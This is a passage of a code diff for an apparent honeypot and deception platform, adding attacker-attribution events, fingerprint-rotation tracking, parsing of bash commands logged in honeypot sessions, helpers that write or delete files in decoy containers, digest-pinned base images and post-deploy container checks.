+        identity_uuid = str(entry["identity_uuid"])
+        primitives: list[str] = sorted(entry.get("primitives") or [])
+        if len(primitives) < _T.MULTI_ACTOR_MIN_PRIMITIVES:
+            # Repo already filters to >= 2 today; defensive against
+            # future schema drift. Deliberately NOT recorded in
+            # seen_now: an identity below the threshold must be
+            # dropped from last_fired by the re-arm pass below.
+            continue
+        seen_now.add(identity_uuid)
+        signature = frozenset(primitives)
+        if last_fired.get(identity_uuid) == signature:
+            continue
+        last_fired[identity_uuid] = signature
+        if bus is None:
+            continue
+        await publish_safely(
+            bus,
+            _topics.attribution(_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED),
+            {
+                "identity_uuid": identity_uuid,
+                "primitives": primitives,
+                "evidence_summary": (
+                    f"{len(primitives)} primitives flagged multi_actor"
+                ),
+                "confidence": _T.MULTI_ACTOR_MAX_CONFIDENCE,
+                "ts": _now(),
+            },
+            event_type=_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED,
+        )
+        fired += 1
+        log.info(
+            "attribution worker: multi_actor_suspected identity=%s primitives=%s",
+            identity_uuid, primitives,
+        )
+    # Rearm: any identity in last_fired that did not qualify on this
+    # pass (absent from candidates, or present with too few
+    # primitives) is removed so the next qualifying flap re-fires.
+    for stale in [k for k in last_fired if k not in seen_now]:
+        del last_fired[stale]
+    return fired
+
+
+def _now() -> float:
+    """Current wall-clock time in epoch seconds, kept behind a
+    function so tests can monkeypatch it."""
+    from time import time as _wall_clock
+    return _wall_clock()
+
+
+__all__ = [
+    "run_attribution_loop",
+    "handle_observation_event",
+    "tick_multi_actor",
+]
--- a/decnet/correlation/fingerprint_rotation.py
+++ b/decnet/correlation/fingerprint_rotation.py
@@ -0,0 +1,153 @@
+"""Attacker substrate-fingerprint rotation detection.
+
+Called inline from the prober at each fingerprint emit site.  Looks up
+the last persisted hash for ``(attacker_uuid, port, probe_type)``;
+when the new hash differs from the last one, emits a derived
+``attacker.fingerprint_rotated`` event (bus + RFC 5424 syslog) and
+stamps the ``Attacker`` row's rotation telemetry.
+
+This is a pure library — no daemon, no async loop.  The prober is the
+only producer.  We just teach it to derive a second event on hash
+flip without standing up another worker (DEBT-032).
+"""
+from __future__ import annotations
+
+import uuid as _uuid
+from dataclasses import dataclass
+from datetime import datetime
+from typing import Any, Callable, Literal
+
+from sqlmodel import Session, select
+
+from decnet.web.db.models import Attacker, AttackerFingerprintState
+
+ProbeType = Literal["jarm", "hassh", "tcpfp"]
+RotationKind = Literal[
+    "no_attacker_row",  # caller raced ahead of correlator; skip silently
+    "first_sighting",   # state row created, no prior hash
+    "unchanged",        # same hash as last sighting
+    "rotated",          # hash differs; event emitted, Attacker stamped
+]
+
+PublishFn = Callable[[str, dict[str, Any]], None]
+SyslogFn = Callable[[str, dict[str, Any]], None]
+
+
+@dataclass
+class RotationOutcome:
+    """Return shape of :func:`record_fingerprint`.  Caller usually
+    ignores it; useful for tests + tracing."""
+    # Which branch record_fingerprint took; see ``RotationKind``.
+    kind: RotationKind
+    # Previously stored hash; None for "no_attacker_row" and
+    # "first_sighting", where there was nothing to compare against.
+    old_hash: str | None
+    # The hash passed in by the caller for this sighting.
+    new_hash: str
+    # Rotation count of the state row after this call; 0 when no state
+    # row existed beforehand.
+    rotation_count: int
+
+
+_ROTATED_EVENT_TYPE = "attacker.fingerprint_rotated"
+
+
+def record_fingerprint(
+    session: Session,
+    *,
+    attacker_ip: str,
+    port: int,
+    probe_type: ProbeType,
+    new_hash: str,
+    ts: datetime,
+    publish_fn: PublishFn | None = None,
+    syslog_fn: SyslogFn | None = None,
+) -> RotationOutcome:
+    """Upsert state row; on hash diff, emit derived event + stamp.
+
+    Resolves ``attacker_uuid`` from ``attacker_ip`` via the existing
+    Attacker table.  If no Attacker row exists yet (the prober raced
+    ahead of the correlator), returns ``kind="no_attacker_row"`` and
+    does nothing — the next probe cycle will pick it up once the
+    correlator has caught up.
+
+    On rotation the state-row update and the Attacker stamp share one
+    database transaction.  ``publish_fn`` / ``syslog_fn`` run before
+    the commit; if either of them or the commit itself raises, the
+    transaction is rolled back and the exception re-raised, so the
+    stored hash never moves ahead of a failed emit.  The emits cannot
+    be undone, so a commit failure after a successful emit means the
+    same rotation is detected and emitted again on a later call.
+
+    Args:
+        session: open SQLModel session; committed (or rolled back) here.
+        attacker_ip: source IP used to look up the Attacker row.
+        port: probed port, part of the state-row key.
+        probe_type: fingerprint family, part of the state-row key.
+        new_hash: fingerprint hash observed by this probe.
+        ts: observation time; stored as ``last_seen`` and, on
+            rotation, as ``Attacker.last_rotation_at``.
+        publish_fn: optional callback ``(event_type, payload)``.
+        syslog_fn: optional callback ``(event_type, payload)``.
+
+    Returns:
+        A :class:`RotationOutcome` describing which branch was taken.
+    """
+    attacker = session.exec(
+        select(Attacker).where(Attacker.ip == attacker_ip)
+    ).first()
+    if attacker is None:
+        return RotationOutcome(
+            kind="no_attacker_row",
+            old_hash=None,
+            new_hash=new_hash,
+            rotation_count=0,
+        )
+
+    row = session.exec(
+        select(AttackerFingerprintState).where(
+            AttackerFingerprintState.attacker_uuid == attacker.uuid,
+            AttackerFingerprintState.port == port,
+            AttackerFingerprintState.probe_type == probe_type,
+        )
+    ).first()
+
+    if row is None:
+        session.add(AttackerFingerprintState(
+            uuid=str(_uuid.uuid4()),
+            attacker_uuid=attacker.uuid,
+            port=port,
+            probe_type=probe_type,
+            last_hash=new_hash,
+            last_seen=ts,
+            rotation_count=0,
+        ))
+        session.commit()
+        return RotationOutcome(
+            kind="first_sighting",
+            old_hash=None,
+            new_hash=new_hash,
+            rotation_count=0,
+        )
+
+    if row.last_hash == new_hash:
+        # Read before commit: attributes may be expired by the commit
+        # and reading them afterwards would force a reload.
+        unchanged_hash = row.last_hash
+        unchanged_count = row.rotation_count
+        row.last_seen = ts
+        session.add(row)
+        session.commit()
+        return RotationOutcome(
+            kind="unchanged",
+            old_hash=unchanged_hash,
+            new_hash=new_hash,
+            rotation_count=unchanged_count,
+        )
+
+    old_hash = row.last_hash
+    row.last_hash = new_hash
+    row.last_seen = ts
+    row.rotation_count += 1
+    rotation_count = row.rotation_count
+    session.add(row)
+
+    attacker.rotation_count += 1
+    attacker.last_rotation_at = ts
+    session.add(attacker)
+
+    payload: dict[str, Any] = {
+        "attacker_uuid": attacker.uuid,
+        "attacker_ip": attacker_ip,
+        "port": port,
+        "probe_type": probe_type,
+        "old_hash": old_hash,
+        "new_hash": new_hash,
+        "rotation_count": rotation_count,
+        "ts": ts.isoformat(),
+    }
+
+    try:
+        if publish_fn is not None:
+            publish_fn(_ROTATED_EVENT_TYPE, payload)
+        if syslog_fn is not None:
+            syslog_fn(_ROTATED_EVENT_TYPE, payload)
+        session.commit()
+    except Exception:
+        # Discard the pending state/Attacker changes so the caller's
+        # session is not left holding a half-applied rotation.
+        session.rollback()
+        raise
+
+    return RotationOutcome(
+        kind="rotated",
+        old_hash=old_hash,
+        new_hash=new_hash,
+        rotation_count=rotation_count,
+    )
--- a/decnet/correlation/parser.py
+++ b/decnet/correlation/parser.py
@@ -32,6 +32,21 @@ _RFC5424_RE = re.compile(
    r"(.+)$",       # 5: SD element + optional MSG
 )

+# Honeypot SSH PROMPT_COMMAND lines arrive double-wrapped: the
+# Docker-stdout collector envelope wraps the inner ``logger
+# --rfc5424 --msgid command -t bash …`` line. Outer MSGID is NIL,
+# real MSGID lives in the body. Mirrors the unwrap logic in
+# ``decnet.collector.worker._INNER_RFC5424_RE`` — the two parsers
+# read the same on-wire format.
+_INNER_RFC5424_RE = re.compile(
+    r"^(\d{4}-\d{2}-\d{2}T\S+)\s+"  # 1: inner TIMESTAMP
+    r"(\S+)\s+"                       # 2: inner HOSTNAME
+    r"(\S+)\s+"                       # 3: inner APP-NAME
+    r"\S+\s+"                         # PROCID (NIL or PID)
+    r"(\S+)\s+"                       # 4: inner MSGID
+    r"(.+)$",                         # 5: inner SD/MSG remainder
+)
+
 # Structured data block: [relay@55555 k="v" ...]
 _SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)

@@ -121,6 +136,21 @@ def parse_line(line: str) -> LogEvent | None:

    ts_raw, decky, service, event_type, sd_rest = m.groups()

+    # Unwrap double-wrapped Docker-stdout envelopes around bash
+    # PROMPT_COMMAND lines. See ``_INNER_RFC5424_RE`` and the matching
+    # logic in ``decnet.collector.worker.parse_rfc5424``. Must run
+    # before the decky/service NIL-guard below — the OUTER decky is
+    # the docker host, the inner header carries the real source.
+    if event_type == "-" and sd_rest.startswith("-"):
+        body = sd_rest[1:].lstrip()
+        inner = _INNER_RFC5424_RE.match(body)
+        if inner is not None:
+            _i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
+            decky = i_host
+            service = i_app
+            event_type = i_msgid
+            sd_rest = i_rest
+
    if decky == "-" or service == "-":
        return None

@@ -137,6 +167,19 @@ def parse_line(line: str) -> LogEvent | None:
        msg = tail.group(1).strip() if tail else ""
    attacker_ip = _extract_attacker_ip(fields, msg)

+    # Free-form bash PROMPT_COMMAND lines arrive with MSGID=NIL or MSGID=command
+    # and a body like `CMD uid=0 user=root src=… pwd=… cmd=<rest of line>`.
+    # Without this rewrite they're invisible to the behavioral profiler, which
+    # filters on event_type ∈ {command, exec, query, …}. The Dockerfile logger
+    # invocation uses --msgid command, so we must also handle the non-nil case.
+    if event_type in ("-", "command") and msg.startswith("CMD ") and "command" not in fields:
+        event_type = "command"
+        head, sep, cmd_rest = msg[4:].partition("cmd=")
+        for k, v in re.findall(r'(\w+)=(\S+)', head):
+            fields.setdefault(k, v)
+        if sep:
+            fields.setdefault("command", cmd_rest)
+
    # Mutator-emitted transitions arrive on the same ingest stream but
    # belong in the substrate-state index, not the per-IP attacker one.
    kind: EventKind = (
--- a/decnet/correlation/reuse_worker.py
+++ b/decnet/correlation/reuse_worker.py
@@ -70,7 +70,7 @@ async def run_reuse_loop(
        wake_tasks.append(asyncio.create_task(
            _run_control_listener_signal(bus, "reuse-correlator"),
        ))
-    except Exception as exc:  # noqa: BLE001
+    except Exception as exc:
        log.warning(
            "reuse correlator: bus unavailable, running in poll-only mode: %s",
            exc,
@@ -86,7 +86,7 @@ async def run_reuse_loop(
                results = await engine.correlate_credential_reuse(
                    repo, min_targets=min_targets,
                )
-            except Exception:  # noqa: BLE001
+            except Exception:
                log.exception("reuse correlator: tick failed")
                results = []

@@ -120,11 +120,11 @@ async def run_reuse_loop(
            t.cancel()
        if heartbeat_task is not None:
            heartbeat_task.cancel()
-        for t in (*wake_tasks, heartbeat_task):
-            if t is None:
+        for task in (*wake_tasks, heartbeat_task):
+            if task is None:
                continue
            with contextlib.suppress(asyncio.CancelledError, Exception):
-                await t
+                await task
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
@@ -143,7 +143,7 @@ async def _wake_on(bus: BaseBus, wake: asyncio.Event, pattern: str) -> None:
                wake.set()
    except asyncio.CancelledError:
        raise
-    except Exception as exc:  # noqa: BLE001
+    except Exception as exc:
        log.warning(
            "reuse correlator: subscriber for %s died (%s); falling back to poll",
            pattern, exc,
--- a/decnet/decky_io/init.py
+++ b/decnet/decky_io/init.py
@@ -0,0 +1,39 @@
+"""Shared primitives for writing/deleting files inside running deckies.
+
+The canary planter and the orchestrator SSH driver both need to drop
+bytes into a decky container's filesystem, then sometimes unlink them.
+The ARG_MAX-safe ``base64 -d``-via-stdin trick lived in two places
+before this module existed.
+
+Public API:
+
+* :func:`write_file_to_container` — write bytes at a path, set mode,
+  optionally backdate mtime.
+* :func:`delete_file_from_container` — best-effort ``rm -f``.
+* :func:`resolve_topology_container` — pick the right docker container
+  for a MazeNET decky based on its services list.
+* :func:`resolve_decky_container` — async helper that takes
+  ``(decky_name, topology_id?)``, hydrates the topology when needed,
+  and returns the docker container name.
+
+Container resolution conventions are documented in
+:mod:`decnet.topology.compose`; we mirror them here without taking
+a runtime dependency on the compose generator.
+"""
+from __future__ import annotations
+
+from .resolve import (
+    resolve_decky_container,
+    resolve_topology_container,
+)
+from .write import (
+    delete_file_from_container,
+    write_file_to_container,
+)
+
+__all__ = [
+    "delete_file_from_container",
+    "resolve_decky_container",
+    "resolve_topology_container",
+    "write_file_to_container",
+]
--- a/decnet/decky_io/resolve.py
+++ b/decnet/decky_io/resolve.py
@@ -0,0 +1,72 @@
+"""Decky-name → docker container name resolution.
+
+Two scopes:
+
+* **Fleet**: every fleet decky has a ``ssh`` service container named
+  ``<decky_name>-ssh`` (see :mod:`decnet.services.ssh`).  We always
+  target it because it carries the most realistic filesystem layout.
+* **MazeNET (topology)**: same ``<name>-ssh`` convention when the
+  decky exposes the ssh service; otherwise the decky's base container
+  named ``decnet_t_<topology_id8>_<decky_name>`` (matches
+  :func:`decnet.topology.compose._container_name`).
+
+Keeping resolution centralised here means new ``docker exec`` callers
+(file drops, future bulk planters, etc.) never need to learn the
+naming conventions — they just call :func:`resolve_decky_container`.
+"""
+from __future__ import annotations
+
+from typing import Any, Iterable, Optional
+
+_SSH_CONTAINER_SUFFIX = "-ssh"
+
+
+def resolve_topology_container(
+    topology_id: str, decky_name: str, services: Iterable[str],
+) -> str:
+    """Name the docker container to target for a MazeNET decky.
+
+    A decky whose *services* include ``"ssh"`` resolves to
+    ``<decky_name>-ssh``; any other decky resolves to
+    ``decnet_t_<first 8 chars of topology_id>_<decky_name>``.
+    Performs no I/O.
+    """
+    exposes_ssh = "ssh" in set(services)
+    if not exposes_ssh:
+        return f"decnet_t_{topology_id[:8]}_{decky_name}"
+    return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
+
+
+async def resolve_decky_container(
+    repo: Any,
+    decky_name: str,
+    *,
+    topology_id: Optional[str] = None,
+) -> str:
+    """Map *decky_name* to the docker container that should be exec'd into.
+
+    With no ``topology_id`` (fleet scope) the answer is always
+    ``<decky_name>-ssh`` and *repo* is never touched, so a nonexistent
+    decky is not detected here.
+
+    With a ``topology_id`` the topology is hydrated from *repo*, the
+    decky is located by name, and its ``services`` list is handed to
+    :func:`resolve_topology_container`.
+
+    Raises:
+        LookupError — the topology could not be hydrated, or none of
+        its deckies carries *decky_name*.
+    """
+    if topology_id is None:
+        return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
+
+    # Imported lazily, only on the topology path.
+    from decnet.topology.persistence import hydrate
+    topo = await hydrate(repo, topology_id)
+    if topo is None:
+        raise LookupError(f"topology {topology_id!r} not found")
+
+    def _name_of(entry: Any) -> Any:
+        # ``decky_config.name`` wins; fall back to the top-level ``name``.
+        return (entry.get("decky_config") or {}).get("name") or entry.get("name")
+
+    found = next((d for d in topo["deckies"] if _name_of(d) == decky_name), None)
+    if found is None:
+        raise LookupError(
+            f"decky {decky_name!r} is not in topology {topology_id!r}"
+        )
+    return resolve_topology_container(
+        topology_id, decky_name, found.get("services") or [],
+    )
--- a/decnet/decky_io/write.py
+++ b/decnet/decky_io/write.py
@@ -0,0 +1,124 @@
+"""``docker exec``-driven file write/delete inside a decky container.
+
+The write path streams a base64-encoded payload over stdin to
+``base64 -d`` inside the container, so binary content of any size up
+to docker's stream limits is safe — interpolating bytes into argv
+would trip ARG_MAX (~128 KB on most kernels) for any non-trivial blob.
+"""
+from __future__ import annotations
+
+import asyncio
+import base64
+import shlex
+from datetime import datetime, timezone
+from typing import Optional
+
+from decnet.logging import get_logger
+
+log = get_logger("decky_io.write")
+
+_DOCKER = "docker"
+_DEFAULT_TIMEOUT = 8.0
+
+
+def _dirname(path: str) -> str:
+    """Return the part of *path* before its last ``/``.
+
+    Falls back to ``"/"`` when *path* contains no slash or when the
+    last slash is its first character.
+    """
+    parent = path.rpartition("/")[0]
+    return parent if parent else "/"
+
+
+async def _run(
+    argv: list[str],
+    *,
+    stdin_bytes: Optional[bytes] = None,
+    timeout: float = _DEFAULT_TIMEOUT,
+) -> tuple[int, str, str]:
+    """Run *argv* as a subprocess (no shell) and collect its result.
+
+    Args:
+        argv: Program and arguments.
+        stdin_bytes: When not ``None``, piped to the child's stdin.
+        timeout: Seconds allowed for the child to finish.
+
+    Returns:
+        ``(returncode, stdout, stderr)`` with both streams decoded as
+        UTF-8 (undecodable bytes replaced).  Two failures are reported
+        through the tuple instead of being raised: ``127`` when the
+        executable cannot be found and ``124`` when *timeout* elapses.
+    """
+    try:
+        proc = await asyncio.create_subprocess_exec(
+            *argv,
+            stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
+            stdout=asyncio.subprocess.PIPE,
+            stderr=asyncio.subprocess.PIPE,
+        )
+    except FileNotFoundError as exc:
+        return 127, "", f"argv[0] not found: {exc}"
+    try:
+        stdout, stderr = await asyncio.wait_for(
+            proc.communicate(input=stdin_bytes), timeout=timeout,
+        )
+    except asyncio.TimeoutError:
+        try:
+            proc.kill()
+        except ProcessLookupError:
+            # Child exited between the timeout firing and the kill.
+            pass
+        # Reap the child.  Without this the killed process is never
+        # waited on and its exit status is never collected.
+        await proc.wait()
+        return 124, "", "timeout"
+    return (
+        proc.returncode if proc.returncode is not None else -1,
+        stdout.decode("utf-8", "replace"),
+        stderr.decode("utf-8", "replace"),
+    )
+
+
+async def write_file_to_container(
+    container: str,
+    path: str,
+    content: bytes,
+    *,
+    mode: int = 0o644,
+    mtime: Optional[datetime] = None,
+    timeout: float = _DEFAULT_TIMEOUT,
+) -> tuple[bool, Optional[str]]:
+    """Drop *content* at *path* inside *container* through ``docker exec``.
+
+    One ``sh -c`` pipeline is run: ``mkdir -p`` the parent directory,
+    decode the base64 payload from stdin into *path*, ``chmod`` it to
+    *mode* (rendered in octal), and — only when *mtime* is given —
+    ``touch -d`` it with that instant converted to UTC and formatted as
+    ``YYYY-MM-DD HH:MM:SS UTC``.
+
+    Returns ``(True, None)`` on exit code 0.  Otherwise returns
+    ``(False, message)`` where *message* is the stripped stderr capped
+    at 256 characters, or ``"rc=<n>"`` if stderr was empty.  An empty
+    *path* is rejected up front with ``(False, "empty path")``.
+    """
+    if not path:
+        return False, "empty path"
+
+    payload = base64.b64encode(content)
+    quoted_path = shlex.quote(path)
+    steps = [
+        f"mkdir -p {shlex.quote(_dirname(path))}",
+        f"base64 -d > {quoted_path}",
+        f"chmod {mode:o} {quoted_path}",
+    ]
+    if mtime is not None:
+        stamp = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
+        steps.append(f"touch -d {shlex.quote(stamp)} {quoted_path}")
+
+    rc, _out, stderr = await _run(
+        [_DOCKER, "exec", "-i", container, "sh", "-c", " && ".join(steps)],
+        stdin_bytes=payload,
+        timeout=timeout,
+    )
+    if rc != 0:
+        log.warning(
+            "decky_io.write failed container=%s path=%s rc=%d stderr=%r",
+            container, path, rc, stderr[:120],
+        )
+        return False, stderr.strip()[:256] or f"rc={rc}"
+    return True, None
+
+
+async def delete_file_from_container(
+    container: str,
+    path: str,
+    *,
+    timeout: float = _DEFAULT_TIMEOUT,
+) -> tuple[bool, Optional[str]]:
+    """Run ``rm -f <path>`` inside *container*; never raises on failure.
+
+    Returns ``(True, None)`` when the command exits 0.  Because
+    ``rm -f`` also exits 0 for a file that was already missing, success
+    means "not present afterwards", not "removed by this call".  On a
+    non-zero exit returns ``(False, message)``: the stripped stderr
+    capped at 256 characters, or ``"rc=<n>"`` if stderr was empty.
+    """
+    rc, _out, stderr = await _run(
+        [_DOCKER, "exec", container, "sh", "-c", f"rm -f {shlex.quote(path)}"],
+        timeout=timeout,
+    )
+    if rc != 0:
+        return False, stderr.strip()[:256] or f"rc={rc}"
+    return True, None
--- a/decnet/distros.py
+++ b/decnet/distros.py
@@ -18,69 +18,86 @@ class DistroProfile:
    build_base: str     # apt-compatible image for service Dockerfiles (FROM ${BASE_IMAGE})


+# Base images are pinned by digest (sha256) to make `docker pull`
+# reproducible — a registry-side rebuild of "debian:bookworm-slim"
+# can't silently swap content under us.  The :tag is kept for human
+# readability; the @sha256 is what Docker actually resolves.
+# Refresh procedure: `docker pull <tag>` then `docker inspect
+# --format '{{index .RepoDigests 0}}' <tag>`.  Last refreshed 2026-05-03.
+_DEBIAN_BOOKWORM = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252"
+_UBUNTU_22_04    = "ubuntu:22.04@sha256:962f6cadeae0ea6284001009daa4cc9a8c37e75d1f5191cf0eb83fe565b63dd7"
+_UBUNTU_20_04    = "ubuntu:20.04@sha256:8feb4d8ca5354def3d8fce243717141ce31e2c428701f6682bd2fafe15388214"
+_ROCKY_9         = "rockylinux:9-minimal@sha256:305de618a5681ff75b1d608fd22b10f362867dff2f550a4f1d427d21cd7f42b4"
+_CENTOS_7        = "centos:7@sha256:be65f488b7764ad3638f236b7b515b3678369a5124c47b8d32916d6487418ea4"
+_ALPINE_3_19     = "alpine:3.19@sha256:6baf43584bcb78f2e5847d1de515f23499913ac9f12bdf834811a3145eb11ca1"
+_FEDORA_39       = "fedora:39@sha256:d63d63fe593749a5e8dbc8152427d40bbe0ece53d884e00e5f3b44859efa5077"
+_KALI_ROLLING    = "kalilinux/kali-rolling@sha256:1fd0364490011f245688c6ed9fee498a11cd779badfbb0b1d3a721d0f49f2d15"
+_ARCH_LATEST     = "archlinux:latest@sha256:5ba8bb318666baef4d33afefc0e65db80f38b23503cb8e7b150d315cc2d4d5da"
+
+
 DISTROS: dict[str, DistroProfile] = {
    "debian": DistroProfile(
        slug="debian",
-        image="debian:bookworm-slim",
+        image=_DEBIAN_BOOKWORM,
        display_name="Debian 12 (Bookworm)",
        hostname_style="generic",
-        build_base="debian:bookworm-slim",
+        build_base=_DEBIAN_BOOKWORM,
    ),
    "ubuntu22": DistroProfile(
        slug="ubuntu22",
-        image="ubuntu:22.04",
+        image=_UBUNTU_22_04,
        display_name="Ubuntu 22.04 LTS (Jammy)",
        hostname_style="generic",
-        build_base="ubuntu:22.04",
+        build_base=_UBUNTU_22_04,
    ),
    "ubuntu20": DistroProfile(
        slug="ubuntu20",
-        image="ubuntu:20.04",
+        image=_UBUNTU_20_04,
        display_name="Ubuntu 20.04 LTS (Focal)",
        hostname_style="generic",
-        build_base="ubuntu:20.04",
+        build_base=_UBUNTU_20_04,
    ),
    "rocky9": DistroProfile(
        slug="rocky9",
-        image="rockylinux:9-minimal",
+        image=_ROCKY_9,
        display_name="Rocky Linux 9",
        hostname_style="rhel",
-        build_base="debian:bookworm-slim",  # Dockerfiles use apt-get; fall back to debian
+        build_base=_DEBIAN_BOOKWORM,  # Dockerfiles use apt-get; fall back to debian
    ),
    "centos7": DistroProfile(
        slug="centos7",
-        image="centos:7",
+        image=_CENTOS_7,
        display_name="CentOS 7",
        hostname_style="rhel",
-        build_base="debian:bookworm-slim",  # Dockerfiles use apt-get; fall back to debian
+        build_base=_DEBIAN_BOOKWORM,  # Dockerfiles use apt-get; fall back to debian
    ),
    "alpine": DistroProfile(
        slug="alpine",
-        image="alpine:3.19",
+        image=_ALPINE_3_19,
        display_name="Alpine Linux 3.19",
        hostname_style="minimal",
-        build_base="debian:bookworm-slim",  # Dockerfiles use apt-get; fall back to debian
+        build_base=_DEBIAN_BOOKWORM,  # Dockerfiles use apt-get; fall back to debian
    ),
    "fedora": DistroProfile(
        slug="fedora",
-        image="fedora:39",
+        image=_FEDORA_39,
        display_name="Fedora 39",
        hostname_style="rhel",
-        build_base="debian:bookworm-slim",  # Dockerfiles use apt-get; fall back to debian
+        build_base=_DEBIAN_BOOKWORM,  # Dockerfiles use apt-get; fall back to debian
    ),
    "kali": DistroProfile(
        slug="kali",
-        image="kalilinux/kali-rolling",
+        image=_KALI_ROLLING,
        display_name="Kali Linux (Rolling)",
        hostname_style="rolling",
-        build_base="kalilinux/kali-rolling",  # Debian-based, apt-get compatible
+        build_base=_KALI_ROLLING,  # Debian-based, apt-get compatible
    ),
    "arch": DistroProfile(
        slug="arch",
-        image="archlinux:latest",
+        image=_ARCH_LATEST,
        display_name="Arch Linux",
        hostname_style="rolling",
-        build_base="debian:bookworm-slim",  # Dockerfiles use apt-get; fall back to debian
+        build_base=_DEBIAN_BOOKWORM,  # Dockerfiles use apt-get; fall back to debian
    ),
 }

--- a/decnet/engine/deployer.py
+++ b/decnet/engine/deployer.py
@@ -3,6 +3,7 @@ Deploy, teardown, and status via Docker SDK + subprocess docker compose.
 """

 import asyncio
+import json
 import shutil
 import subprocess  # nosec B404
 import time
@@ -57,6 +58,8 @@ _CANONICAL_AUTH_HELPER_DIR = Path(__file__).parent.parent / "templates" / "_shar
 _AUTH_HELPER_SERVICES = {"ssh", "telnet"}
 _CANONICAL_NTLMSSP = Path(__file__).parent.parent / "templates" / "_shared" / "ntlmssp.py"
 _NTLMSSP_SERVICES = {"smb", "rdp"}
+_CANONICAL_CADDY_MODULES_DIR = Path(__file__).parent.parent / "templates" / "_caddy_modules"
+_CADDY_SERVICES = {"http", "https"}


 def _sync_logging_helper(config: DecnetConfig) -> None:
@@ -163,6 +166,104 @@ def _sync_sessrec_sources(config: DecnetConfig) -> None:
                    shutil.copy2(src, dest)


+def _chown_tree(dest: Path, owner_ref: Path) -> None:
+    """Give *dest*, and everything beneath it, the uid/gid of *owner_ref*.
+
+    Does nothing unless the effective uid is 0.  Entries that cannot be
+    chowned are skipped silently.
+    """
+    import os
+    if os.geteuid() != 0:
+        return
+    ref = owner_ref.stat()
+    entries = [dest]
+    if dest.is_dir():
+        entries.extend(dest.rglob("*"))
+    for entry in entries:
+        try:
+            # lchown: change the link itself, never what it points at.
+            os.lchown(entry, ref.st_uid, ref.st_gid)
+        except OSError:
+            pass
+
+
+def _sync_caddy_modules(config: DecnetConfig) -> None:
+    """Mirror ``_caddy_modules/`` into each active http/https build context.
+
+    The xcaddy builder stage in each Dockerfile references
+    ``_caddy_modules/decnetfp`` relative to its build context (the
+    per-service template dir). Since the canonical source lives one
+    level up at ``templates/_caddy_modules/``, it is copied into every
+    distinct build context used by an http/https service in *config*.
+
+    Sub-directories are replaced wholesale; plain files are copied only
+    when missing or different.  Returns without doing anything when the
+    canonical directory does not exist.
+    """
+    from decnet.services.registry import get_service
+    src_dir = _CANONICAL_CADDY_MODULES_DIR
+    if not src_dir.is_dir():
+        return
+    seen: set[Path] = set()
+    for decky in config.deckies:
+        for svc_name in decky.services:
+            if svc_name not in _CADDY_SERVICES:
+                continue
+            svc = get_service(svc_name)
+            if svc is None:
+                continue
+            ctx = svc.dockerfile_context()
+            if ctx is None or ctx in seen:
+                continue
+            seen.add(ctx)
+            dest_dir = ctx / "_caddy_modules"
+            dest_dir.mkdir(exist_ok=True)
+            for child in src_dir.iterdir():
+                dest_child = dest_dir / child.name
+                if child.is_dir():
+                    if dest_child.exists():
+                        shutil.rmtree(dest_child)
+                    shutil.copytree(child, dest_child)
+                elif not dest_child.exists() or dest_child.read_bytes() != child.read_bytes():
+                    shutil.copy2(child, dest_child)
+            # One ownership pass over the whole mirror, *including*
+            # ``dest_dir`` itself.  Chowning only the copied children
+            # left a directory created under root owned by root, so a
+            # later unprivileged run could not replace entries in it.
+            _chown_tree(dest_dir, src_dir)
+
+
+def _compose_ps(compose_file: Path) -> list[dict[str, object]]:
+    """Collect the rows printed by ``docker compose ps --all --format json``.
+
+    Intended for post-deploy verification: ``compose up -d`` succeeds as
+    soon as containers are started, so a service that dies on boot is
+    only visible in this listing.
+
+    Returns an empty list when the ``docker`` binary is missing, when
+    the command exits non-zero, or when nothing parseable is printed;
+    the caller is expected to treat that as "cannot verify".
+    """
+    argv = [
+        "docker", "compose", "-p", "decnet", "-f", str(compose_file),
+        "ps", "--all", "--format", "json",
+    ]
+    try:
+        proc = subprocess.run(  # nosec B603
+            argv, capture_output=True, text=True, check=False,
+        )
+    except FileNotFoundError:
+        return []
+    if proc.returncode != 0:
+        return []
+
+    parsed: list[dict[str, object]] = []
+    # Output is handled one line at a time: each line may hold a single
+    # JSON object or a JSON array of objects.  Lines that fail to parse
+    # are dropped without discarding the rest.
+    for raw in (proc.stdout or "").splitlines():
+        text = raw.strip()
+        if not text:
+            continue
+        try:
+            doc = json.loads(text)
+        except json.JSONDecodeError:
+            continue
+        candidates = doc if isinstance(doc, list) else [doc]
+        parsed.extend(item for item in candidates if isinstance(item, dict))
+    return parsed
+
+
 def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None:
    import os
    # -p decnet pins the compose project name. Without it, docker compose
@@ -393,6 +494,8 @@ def _compose_with_retry(
                console.print(f"[red]{result.stderr.strip()}[/]")
                log.error("docker compose %s failed after %d attempts: %s",
                          " ".join(args), retries, result.stderr.strip())
+    if last_exc is None:  # pragma: no cover — retries=0 is not a supported call
+        raise RuntimeError("_compose_with_retry exhausted retries without capturing an error")
    raise last_exc


@@ -562,6 +665,7 @@ def deploy(config: DecnetConfig, dry_run: bool = False, no_cache: bool = False,
    _sync_sessrec_sources(config)
    _sync_auth_helper_sources(config)
    _sync_ntlmssp_sources(config)
+    _sync_caddy_modules(config)

    compose_path = write_compose(config, COMPOSE_FILE)
    console.print(f"[bold cyan]Compose file written[/] → {compose_path}")
@@ -951,8 +1055,84 @@ async def deploy_topology(repo, topology_id: str, *, dry_run: bool = False) -> N
        )
        raise

-    await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
-    log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
+    # Post-deploy verification: ``compose up -d`` returns 0 the moment
+    # containers are *started*, so a service that crashes on boot
+    # (port bind failure, bad image, missing dependency) leaves the
+    # topology row sitting at ACTIVE while half the substrate is dead.
+    # Sample compose ps once and downgrade to DEGRADED if any expected
+    # container isn't running — operators see real state instead of an
+    # optimistic flag.
+    ps_rows = await anyio.to_thread.run_sync(
+        lambda: _compose_ps(compose_path),
+    )
+    bad: list[str] = []
